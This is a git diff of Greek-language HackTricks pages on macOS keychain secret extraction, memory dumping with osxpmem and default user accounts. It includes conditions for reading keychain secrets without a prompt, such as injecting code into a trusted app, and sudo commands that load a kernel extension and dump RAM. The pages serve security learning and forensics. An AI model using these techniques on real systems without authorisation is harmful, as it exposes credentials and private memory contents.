* Η API **`SecItemExport`** εξάγει τα κλειδιά και τα πιστοποιητικά, αλλά μπορεί να χρειαστεί να ορίσετε κωδικούς πρόσβασης για να εξαχθούν τα περιεχόμενα κρυπτογραφημένα
|
||||
* Η ΑΡΙ **`SecKeychainItemCopyContent`** λαμβάνει το κείμενο
|
||||
* Η ΑΡΙ **`SecItemExport`** εξάγει τα κλειδιά και τα πιστοποιητικά αλλά μπορεί να χρειαστεί να ορίσετε κωδικούς πρόσβασης για να εξάγετε το περιεχόμενο κρυπτογραφημένο
|
||||
|
||||
Και αυτές είναι οι **απαιτήσεις** για να μπορείτε να **εξάγετε ένα μυστικό χωρίς ερώτηση**:
|
||||
Και αυτά είναι τα **απαιτούμενα** για να μπορείτε να **εξάγετε ένα μυστικό χωρίς παράθυρο ειδοποίησης**:
|
||||
|
||||
* Εάν υπάρχουν **1+ εμπιστευμένες** εφαρμογές που αναφέρονται:
|
||||
* Χρειάζεστε τις κατάλληλες **εξουσιοδοτήσεις** (**`Nil`**, ή να είστε **μέρος** της επιτρεπόμενης λίστας εφαρμογών στην εξουσιοδότηση για πρόσβαση στις πληροφορίες του μυστικού)
|
||||
* Χρειάζεστε την υπογραφή κώδικα για να ταιριάζει με το **PartitionID**
|
||||
* Χρειάζεστε την υπογραφή κώδικα για να ταιριάζει με μια **εμπιστευμένη εφαρμογή** (ή να είστε μέλος της σωστής KeychainAccessGroup)
|
||||
* Εάν υπάρχουν **1+ εμπιστευμένες** εφαρμογές στη λίστα:
|
||||
* Χρειάζεστε τις κατάλληλες **εξουσιοδοτήσεις** (**`Nil`**, ή να είστε **μέρος** της επιτρεπόμενης λίστας εφαρμογών στην εξουσιοδότηση για πρόσβαση στις μυστικές πληροφορίες)
|
||||
* Χρειάζεστε ταιριαστή υπογραφή κώδικα με το **PartitionID**
|
||||
* Χρειάζεστε ταιριαστή υπογραφή κώδικα με αυτήν μιας **εμπιστευμένης εφαρμογής** (ή να είστε μέλος της σωστής ομάδας KeychainAccessGroup)
|
||||
* Εάν **εμπιστεύονται όλες οι εφαρμογές**:
|
||||
* Χρειάζεστε τις κατάλληλες **εξουσιοδοτήσεις**
|
||||
* Χρειάζεστε την υπογραφή κώδικα για να ταιριάζει με το **PartitionID**
|
||||
* Εάν δεν υπάρχει **PartitionID**, τότε αυτό δεν είναι απαραίτητο
|
||||
* Χρειάζεστε ταιριαστή υπογραφή κώδικα με το **PartitionID**
|
||||
* Εάν **δεν υπάρχει PartitionID**, τότε αυτό δεν είναι απαραίτητο
|
||||
|
||||
{% hint style="danger" %}
|
||||
Συνεπώς, εάν υπάρχει **1 εφαρμογή που αναφέρεται**, χρειάζεστε να **ενσωματώσετε κώδικα σε αυτήν την εφαρμογή**.
|
||||
Συνεπώς, εάν υπάρχει **1 εφαρμογή στη λίστα**, χρειάζεται να **ενθαρρύνετε κώδικα σε αυτήν την εφαρμογή**.
|
||||
|
||||
Εάν η λέξη **apple** αναφέρεται στο **partitionID**, μπορείτε να αποκτήσετε πρόσβαση με τη χρήση της εντολής **`osascript`**, οπότε οτιδήποτε εμπιστεύεται όλες τις εφαρμογές με το apple στο partitionID. Μπορεί να χρησιμοποιηθεί επίσης το **`Python`** για αυτό.
|
||||
Εάν το **apple** είναι υποδειγμένο στο **partitionID**, μπορείτε να έχετε πρόσβαση με το **`osascript`** σε οτιδήποτε εμπιστεύεται όλες τις εφαρμογές με το apple στο partitionID. Το **`Python`** μπορεί επίσης να χρησιμοποιηθεί γι' αυτό.
|
||||
{% endhint %}
|
||||
|
||||
### Δύο επιπλέον χαρακτηριστικά
|
||||
|
||||
* **Αόρατο**: Είναι ένα σημαία boolean για να **αποκρύψει** την καταχώρηση από την εφαρμογή **UI** Keychain
|
||||
* **Γενικό**: Χρησιμοποιείται για την αποθήκευση **μεταδεδομένων** (οπότε ΔΕΝ ΕΙΝΑΙ ΚΡΥΠΤΟΓΡΑΦΗΜΕΝΟ)
|
||||
* Η Microsoft αποθήκευε όλα τα διακριτικά ανανέωσης σε καθαρό κείμενο για πρόσβαση σε ευαίσθητα σημεία πρόσβασης.
|
||||
* **Αόρατο**: Είναι ένα λογικό σήμα για να **κρύψετε** την καταχώρηση από την εφαρμογή **UI** Keychain
|
||||
* **Γενικό**: Χρησιμοποιείται για την αποθήκευση **μεταδεδομένων** (άρα ΔΕΝ ΕΙΝΑΙ ΚΡΥΠΤΟΓΡΑΦΗΜΕΝΟ)
|
||||
* Η Microsoft αποθήκευε σε καθαρό κείμενο όλα τα ανανεωμένα τεκμήρια για πρόσβαση σε ευαίσθητα σημεία.
|
||||
|
||||
## Αναφορές
|
||||
|
||||
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε εάν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στην** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,42 +1,56 @@
|
|||
# Αποσπάσματα Μνήμης macOS
|
||||
# macOS Απορρόφηση Μνήμης
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## Αρχεία Μνήμης
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κλοπή πληροφοριών.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Αρτεφάκτα Μνήμης
|
||||
|
||||
### Αρχεία Swap
|
||||
|
||||
Τα αρχεία swap, όπως το `/private/var/vm/swapfile0`, λειτουργούν ως **μνήμες cache όταν η φυσική μνήμη είναι γεμάτη**. Όταν δεν υπάρχει πλέον χώρος στη φυσική μνήμη, τα δεδομένα μεταφέρονται σε ένα αρχείο swap και στη συνέχεια επαναφέρονται στη φυσική μνήμη όταν απαιτείται. Μπορεί να υπάρχουν πολλά αρχεία swap, με ονόματα όπως swapfile0, swapfile1 και ούτω καθεξής.
|
||||
Τα αρχεία swap, όπως το `/private/var/vm/swapfile0`, λειτουργούν ως **μνήμες cache όταν η φυσική μνήμη είναι γεμάτη**. Όταν δεν υπάρχει άλλος χώρος στη φυσική μνήμη, τα δεδομένα μεταφέρονται σε ένα αρχείο swap και στη συνέχεια επαναφέρονται στη φυσική μνήμη όταν χρειάζεται. Μπορεί να υπάρχουν πολλά αρχεία swap, με ονόματα όπως swapfile0, swapfile1 κ.λπ.
|
||||
|
||||
### Εικόνα Hibernate
|
||||
### Εικόνα Hibernation
|
||||
|
||||
Το αρχείο που βρίσκεται στο `/private/var/vm/sleepimage` είναι κρίσιμο κατά την **κατάσταση αδράνειας**. **Τα δεδομένα από τη μνήμη αποθηκεύονται σε αυτό το αρχείο όταν το OS X μπαίνει σε κατάσταση αδράνειας**. Κατά την αφύπνιση του υπολογιστή, το σύστημα ανακτά τα δεδομένα μνήμης από αυτό το αρχείο, επιτρέποντας στον χρήστη να συνεχίσει από εκεί που σταμάτησε.
|
||||
Το αρχείο που βρίσκεται στο `/private/var/vm/sleepimage` είναι κρίσιμο κατά τη διάρκεια της **λειτουργίας υπνώσεως**. **Τα δεδομένα από τη μνήμη αποθηκεύονται σε αυτό το αρχείο όταν το OS X κάνει υπνώση**. Κατά το ξύπνημα του υπολογιστή, το σύστημα ανακτά τα δεδομένα μνήμης από αυτό το αρχείο, επιτρέποντας στον χρήστη να συνεχίσει από το σημείο που σταμάτησε.
|
||||
|
||||
Αξίζει να σημειωθεί ότι σε σύγχρονα συστήματα MacOS, αυτό το αρχείο είναι συνήθως κρυπτογραφημένο για λόγους ασφαλείας, καθιστώντας την ανάκτηση δύσκολη.
|
||||
Αξίζει να σημειωθεί ότι σε μοντέρνα συστήματα MacOS, αυτό το αρχείο είναι συνήθως κρυπτογραφημένο για λόγους ασφαλείας, κάτι που δυσκολεύει την ανάκτηση.
|
||||
|
||||
* Για να ελέγξετε εάν η κρυπτογράφηση είναι ενεργοποιημένη για το sleepimage, μπορείτε να εκτελέσετε την εντολή `sysctl vm.swapusage`. Αυτό θα εμφανίσει εάν το αρχείο είναι κρυπτογραφημένο.
|
||||
* Για να ελέγξετε αν η κρυπτογράφηση είναι ενεργοποιημένη για το sleepimage, μπορείτε να εκτελέσετε την εντολή `sysctl vm.swapusage`. Αυτό θα δείξει αν το αρχείο είναι κρυπτογραφημένο.
|
||||
|
||||
### Αρχεία Καταγραφής Πίεσης Μνήμης
|
||||
### Καταγραφές Πίεσης Μνήμης
|
||||
|
||||
Ένα άλλο σημαντικό αρχείο που σχετίζεται με τη μνήμη στα συστήματα MacOS είναι το **αρχείο καταγραφής πίεσης μνήμης**. Αυτά τα αρχεία καταγραφής βρίσκονται στο `/var/log` και περιέχουν λεπτομερείς πληροφορίες σχετικά με τη χρήση της μνήμης του συστήματος και τα γεγονότα πίεσης. Μπορούν να είναι ιδιαίτερα χρήσιμα για τη διάγνωση θεμάτων που σχετίζονται με τη μνήμη ή για την κατανόηση του τρόπου διαχείρισης της μνήμης από το σύστημα με την πάροδο του χρόνου.
|
||||
Ένα άλλο σημαντικό αρχείο σχετικά με τη μνήμη σε συστήματα MacOS είναι το **αρχείο καταγραφής πίεσης μνήμης**. Αυτά τα αρχεία καταγραφής βρίσκονται στο `/var/log` και περιέχουν λεπτομερείς πληροφορίες σχετικά με τη χρήση μνήμης του συστήματος και τα γεγονότα πίεσης. Μπορούν να είναι ιδιαίτερα χρήσιμα για τη διάγνωση θεμάτων που σχετίζονται με τη μνήμη ή την κατανόηση του τρόπου με τον οποίο το σύστημα διαχειρίζεται τη μνήμη με τον χρόνο.
|
||||
|
||||
## Αποστολή μνήμης με το osxpmem
|
||||
## Απορρόφηση μνήμης με το osxpmem
|
||||
|
||||
Για να αποστείλετε τη μνήμη σε μια μηχανή MacOS, μπορείτε να χρησιμοποιήσετε το [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
|
||||
Για να απορροφήσετε τη μνήμη σε μια μηχανή MacOS, μπορείτε να χρησιμοποιήσετε το [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
|
||||
|
||||
**Σημείωση**: Οι παρακάτω οδηγίες θα λειτουργήσουν μόνο για Mac με αρχιτεκτονική Intel. Αυτό το εργαλείο είναι τώρα αρχειοθετημένο και η τελευταία έκδοση ήταν το 2017. Το δυαδικό που λήφθηκε χρησιμοποιώντας τις παρακάτω οδηγίες απευθύνεται σε επεξεργαστές Intel καθώς το Apple Silicon δεν υπήρχε το 2017. Μπορεί να είναι δυνατή η μεταγλώττιση του δυαδικού για την αρχιτεκτονική arm64, αλλά θα πρέπει να το δοκιμάσετε μόνοι σας.
|
||||
**Σημείωση**: Οι παρακάτω οδηγίες θα λειτουργήσουν μόνο για Mac με αρχιτεκτονική Intel. Αυτό το εργαλείο είναι τώρα αρχειοθετημένο και η τελευταία έκδοση ήταν το 2017. Το δυαδικό που κατεβάζετε χρησιμοποιώντας τις παρακάτω οδηγίες στοχεύει σε chips Intel καθώς το Apple Silicon δεν υπήρχε το 2017. Μπορεί να είναι δυνατό να μεταγλωττίσετε το δυαδικό για αρχιτεκτονική arm64 αλλά θα πρέπει να το δοκιμάσετε μόνοι σας.
|
||||
```bash
|
||||
#Dump raw format
|
||||
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||
|
@ -44,16 +58,16 @@ sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
|||
#Dump aff4 format
|
||||
sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4
|
||||
```
|
||||
Εάν αντιμετωπίσετε αυτό το σφάλμα: `osxpmem.app/MacPmem.kext απέτυχε να φορτωθεί - (libkern/kext) αποτυχία πιστοποίησης (κυριότητα/δικαιώματα αρχείου); ελέγξτε τα αρχεία καταγραφής του συστήματος/πυρήνα για σφάλματα ή δοκιμάστε το kextutil(8)` Μπορείτε να το διορθώσετε κάνοντας:
|
||||
Εάν βρείτε αυτό το σφάλμα: `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` Μπορείτε να το διορθώσετε κάνοντας:
|
||||
```bash
|
||||
sudo cp -r osxpmem.app/MacPmem.kext "/tmp/"
|
||||
sudo kextutil "/tmp/MacPmem.kext"
|
||||
#Allow the kext in "Security & Privacy --> General"
|
||||
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||
```
|
||||
**Άλλα σφάλματα** μπορεί να διορθωθούν **επιτρέποντας τη φόρτωση του kext** στις "Ασφάλεια & Προσωπικά Δεδομένα --> Γενικά", απλά **επιτρέψτε** το.
|
||||
**Άλλα σφάλματα** μπορεί να διορθωθούν επιτρέποντας τη φόρτωση του kext στις "Ασφάλεια & Απορρήτου --> Γενικά", απλά **επιτρέψτε** το.
|
||||
|
||||
Μπορείτε επίσης να χρησιμοποιήσετε αυτό το **oneliner** για να κατεβάσετε την εφαρμογή, να φορτώσετε το kext και να κατεβάσετε τη μνήμη:
|
||||
Μπορείτε επίσης να χρησιμοποιήσετε αυτό το **oneliner** για να κατεβάσετε την εφαρμογή, να φορτώσετε το kext και να κάνετε dump τη μνήμη:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -62,16 +76,28 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,26 +2,40 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
### Κοινοί Χρήστες
|
||||
|
||||
* **Daemon**: Χρήστης που είναι καταχωρημένος για τους συστημικούς δαίμονες. Τα προεπιλεγμένα ονόματα λογαριασμών δαίμονα συνήθως ξεκινούν με ένα "\_":
|
||||
* **Daemon**: Χρήστης που είναι κρατημένος για συστημικούς δαίμονες. Τα προεπιλεγμένα ονόματα λογαριασμών δαίμονα συνήθως ξεκινούν με ένα "\_":
|
||||
|
||||
```bash
|
||||
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
|
||||
```
|
||||
* **Guest**: Λογαριασμός για επισκέπτες με πολύ αυστηρές άδειες
|
||||
* **Επισκέπτης**: Λογαριασμός για επισκέπτες με πολύ αυστηρές άδειες
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -35,21 +49,7 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
|
|||
|
||||
### Δικαιώματα Χρήστη
|
||||
|
||||
* **Κανονικός Χρήστης**: Ο πιο βασικός τύπος χρήστη. Αυτός ο χρήστης χρειάζεται άδεια από έναν διαχειριστή χρήστη για να εγκαταστήσει λογισμικό ή να εκτελέσει άλλες προηγμένες εργασίες. Δεν μπορεί να το κάνει μόνος του.
|
||||
* **Διαχειριστής Χρήστης**: Ένας χρήστης που λειτουργεί κυρίως ως κανονικός χρήστης, αλλά του επιτρέπεται επίσης να εκτελεί ενέργειες root, όπως η εγκατάσταση λογισμικού και άλλες διαχειριστικές εργασίες. Όλοι οι χρήστες που ανήκουν στην ομάδα διαχειριστών έχουν πρόσβαση στο root μέσω του αρχείου sudoers.
|
||||
* **Root**: Ο χρήστης root επιτρέπεται να εκτελεί σχεδόν οποιαδήποτε ενέργεια (υπάρχουν περιορισμοί που επιβάλλονται από προστασίες όπως η System Integrity Protection).
|
||||
